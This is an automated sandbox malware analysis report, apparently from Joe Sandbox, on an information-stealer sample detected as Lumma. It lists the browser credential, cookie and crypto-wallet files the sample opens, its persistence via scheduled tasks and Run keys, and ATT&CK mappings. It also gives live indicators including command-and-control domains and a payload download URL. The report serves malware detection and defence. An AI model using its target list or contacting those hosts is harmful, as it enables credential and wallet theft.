                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqlite
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqlite
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Users\user\Desktop\2q45IEa3Ee.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZQIXMVQGAH
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\AIXACVYBSB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\CURQNKVOIX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\HTAGVDFUIE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KATAXZVCPS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\DTBZGIOOSO
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\KZWFNRXYKI
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ONBQCLYSPU
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\SFPUSAFIOL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\VAMYDFPUND
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\XZXHAVGRAG
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 2357
                  Source: Yara match File source: 00000007.00000002.1920616270.000000000140A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 0000000B.00000002.1939197101.000000000071D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1740, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5856, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5900, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2128, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5948, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 1740, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5900, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 2128, type: MEMORYSTR
                  Source: Yara match File source: sslproxydump.pcap, type: PCAP
                  Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara match File source: 00000000.00000003.1824382503.0000000005E26000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: C:\Users\user\AppData\Local\Temp\uw5Stgma3gbM9Xo4g_6cCoQ.zip, type: DROPPED
                  Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
                  Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
                  Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
                  Execution: 1 Windows Management Instrumentation; 11 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
                  Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Privilege Escalation: 1 DLL Side-Loading; 411 Process Injection; 1 Scheduled Task/Job; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
                  Defense Evasion: 1 Disable or Modify Tools; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 3 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 1 Masquerading; 351 Virtualization/Sandbox Evasion; 411 Process Injection
                  Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
                  Discovery: 1 System Time Discovery; 22 File and Directory Discovery; 135 System Information Discovery; 1 Query Registry; 741 Security Software Discovery; 11 Process Discovery; 351 Virtualization/Sandbox Evasion; 1 System Network Configuration Discovery; Network Sniffing
                  Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
                  Collection: 1 Archive Collected Data; 31 Data from Local System; 1 Email Collection; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
                  Command and Control: 2 Ingress Tool Transfer; 21 Encrypted Channel; 1 Non-Standard Port; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
                  Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
                  Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
                  [Behavior Graph, image not reproduced. Behavior Graph ID: 1429253; Sample: 2q45IEa3Ee.exe; Startdate: 21/04/2024; Architecture: WINDOWS; Score: 100]

                  Source | Detection | Scanner | Label
                  2q45IEa3Ee.exe | 24% | Virustotal |
                  2q45IEa3Ee.exe | 29% | ReversingLabs | Win32.Trojan.Generic

                  Source | Detection | Scanner | Label
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | 100% | Avira | TR/AD.Nekark.sbdpe
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | 100% | Avira | TR/AD.Nekark.sbdpe
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe | 100% | Avira | TR/AD.Nekark.sbdpe
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | 100% | Avira | TR/AD.Nekark.sbdpe
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe | 100% | Joe Sandbox ML |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | 100% | Joe Sandbox ML |
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.Lummastealer
                  C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe | 77% | Virustotal |
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe | 77% | Virustotal |
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\lumma1504[1].exe | 77% | Virustotal |
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe | 92% | ReversingLabs | ByteCode-MSIL.Spyware.Lummastealer
                  C:\Users\user\AppData\Local\Temp\spanBzNJzauM1END\oRkIPIEeryat7GMgjkBr.exe | 77% | Virustotal |
                  No Antivirus matches
                  Source | Detection | Scanner | Label
                  bordersoarmanusjuw.shop | 2% | Virustotal |
                  Name | IP | Active | Malicious | Antivirus Detection | Reputation
                  bordersoarmanusjuw.shop | 172.67.189.66 | true | true | | unknown
                  ipinfo.io | 34.117.186.192 | true | false | | high
                  db-ip.com | 104.26.5.15 | true | false | | high
                      NameMaliciousAntivirus DetectionReputation
                      bordersoarmanusjuw.shoptrueunknown
                      https://bordersoarmanusjuw.shop/apitrueunknown
                      mealplayerpreceodsju.shoptrueunknown
                      absentconvicsjawun.shoptrueunknown
                      http://193.233.132.253/lumma1504.exetrueunknown
                      pushjellysingeywus.shoptrueunknown
                      economicscreateojsu.shoptrueunknown
                      https://ipinfo.io/widget/demo/81.181.57.52false
                        high
                        wifeplasterbakewis.shoptrueunknown
                        https://db-ip.com/demo/home.php?s=81.181.57.52false
                          high
                          suitcaseacanehalk.shoptrueunknown
                          entitlementappwo.shoptrueunknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.189.66 | bordersoarmanusjuw.shop | United States | 13335 | CLOUDFLARENETUS | true
34.117.186.192 | ipinfo.io | United States | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
104.26.5.15 | db-ip.com | United States | 13335 | CLOUDFLARENETUS | false
193.233.132.253 | unknown | Russian Federation | 2895 | FREE-NET-ASFREEnetEU | true
                                                                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                      Analysis ID:1429253
                                                                                                                      Start date and time:2024-04-21 15:30:11 +02:00
                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                      Overall analysis duration:0h 9m 40s
                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                      Report type:full
                                                                                                                      Cookbook file name:default.jbs
                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:20
                                                                                                                      Number of new started drivers analysed:0
                                                                                                                      Number of existing processes analysed:0
                                                                                                                      Number of existing drivers analysed:0
                                                                                                                      Number of injected processes analysed:0
                                                                                                                      Technologies:
                                                                                                                      • HCA enabled
                                                                                                                      • EGA enabled
                                                                                                                      • AMSI enabled
                                                                                                                      Analysis Mode:default
                                                                                                                      Analysis stop reason:Timeout
                                                                                                                      Sample name:2q45IEa3Ee.exe
                                                                                                                      renamed because original name is a hash value
                                                                                                                      Original Sample Name:4a36fa7c0ccbc6842c541a6439ab545a.exe
                                                                                                                      Detection:MAL
                                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@23/30@3/4
                                                                                                                      EGA Information:
                                                                                                                      • Successful, ratio: 87.5%
                                                                                                                      HCA Information:Failed
                                                                                                                      Cookbook Comments:
                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RegAsm.exe, PID 5900 because there are no executed functions
                                                                                                                      • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                      • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Not all processes were analyzed, report is missing behavior information
                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
14:31:20 | Task Scheduler | Run new task: MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c HR path: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
14:31:20 | Task Scheduler | Run new task: MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c LG path: C:\ProgramData\MSIUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\MSIUpdaterV202.exe
14:31:23 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
14:31:32 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c C:\Users\user\AppData\Local\AdobeUpdaterV202_3e3a2bee5ace9e061f31a101c1269b0c\AdobeUpdaterV202.exe
15:31:20 | API Interceptor | 36x Sleep call for process: RegAsm.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.189.66 | SecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exe | malicious | LummaC |
172.67.189.66 | wZtUQNC2cO.exe | malicious | LummaC |
34.117.186.192 | SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe | malicious | Unknown | ipinfo.io/json
34.117.186.192 | SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe | malicious | Unknown | ipinfo.io/json
34.117.186.192 | Raptor.HardwareService.Setup 1.msi | malicious | Unknown | ipinfo.io/ip
34.117.186.192 | Conferma_Pdf_Editor.exe | malicious | Planet Stealer | ipinfo.io/
34.117.186.192 | Conferma_Pdf_Editor.exe | malicious | Planet Stealer | ipinfo.io/
34.117.186.192 | w.sh | malicious | Xmrig | /ip
34.117.186.192 | Raptor.HardwareService.Setup_2.3.6.0.msi | malicious | Unknown | ipinfo.io/ip
34.117.186.192 | Raptor.HardwareService.Setup_2.3.6.0.msi | malicious | Unknown | ipinfo.io/ip
34.117.186.192 | uUsgzQ3DoW.exe | malicious | RedLine | ipinfo.io/ip
34.117.186.192 | 8BZBgbeCcz.exe | malicious | RedLine | ipinfo.io/ip
                                                                                                                          104.26.5.15SecuriteInfo.com.Win64.Evo-gen.17494.7440.exeGet hashmaliciousUnknownBrowse
                                                                                                                          • api.db-ip.com/v2/free/127.0.0.1
                                                                                                                          Nemty.exeGet hashmaliciousNemtyBrowse
                                                                                                                          • api.db-ip.com/v2/free/84.17.52.2/countryName
                                                                                                                          227.exeGet hashmaliciousNemtyBrowse
                                                                                                                          • api.db-ip.com/v2/free/102.129.143.40/countryName
                                                                                                                          193.233.132.253TANQUIVUIA.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253/lumma1504.exe
                                                                                                                          SecuriteInfo.com.Trojan.Siggen28.25504.27914.23637.exeGet hashmaliciousGlupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                          • 193.233.132.253/lumma1104.exe
                                                                                                                          80OrFCsz0u.exeGet hashmaliciousGCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253/lumma1104.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253/lumma1104.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253/lumma1104.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253/lumma1104.exe
                                                                                                                          file.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253/lumma1104.exe
                                                                                                                          bX5uIt2kh3.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253:9091/static/lumma3.exe
                                                                                                                          00eEcX26T5.exeGet hashmaliciousLummaC, PureLog Stealer, RisePro StealerBrowse
                                                                                                                          • 193.233.132.253:9091/static/lumma3.exe
                                                                                                                          t6Vufjy8wo.exeGet hashmaliciousRisePro StealerBrowse
                                                                                                                          • 193.233.132.253:9091/static/lumma3.exe
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                          bordersoarmanusjuw.shopSecuriteInfo.com.Trojan.PWS.Steam.37210.2413.24955.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          TANQUIVUIA.exeGet hashmaliciousLummaC, RisePro StealerBrowse
                                                                                                                          • 104.21.9.123
                                                                                                                          wZtUQNC2cO.exeGet hashmaliciousLummaCBrowse
                                                                                                                          • 172.67.189.66
                                                                                                                          ipinfo.iofile.exeGet hashmaliciousClipboard Hijacker, RisePro StealerBrowse
                                                                                                                          • 34.117.186.192
                                                                                                                          SajWKdHxdF.exeGet hashmaliciousRisePro StealerBrowse
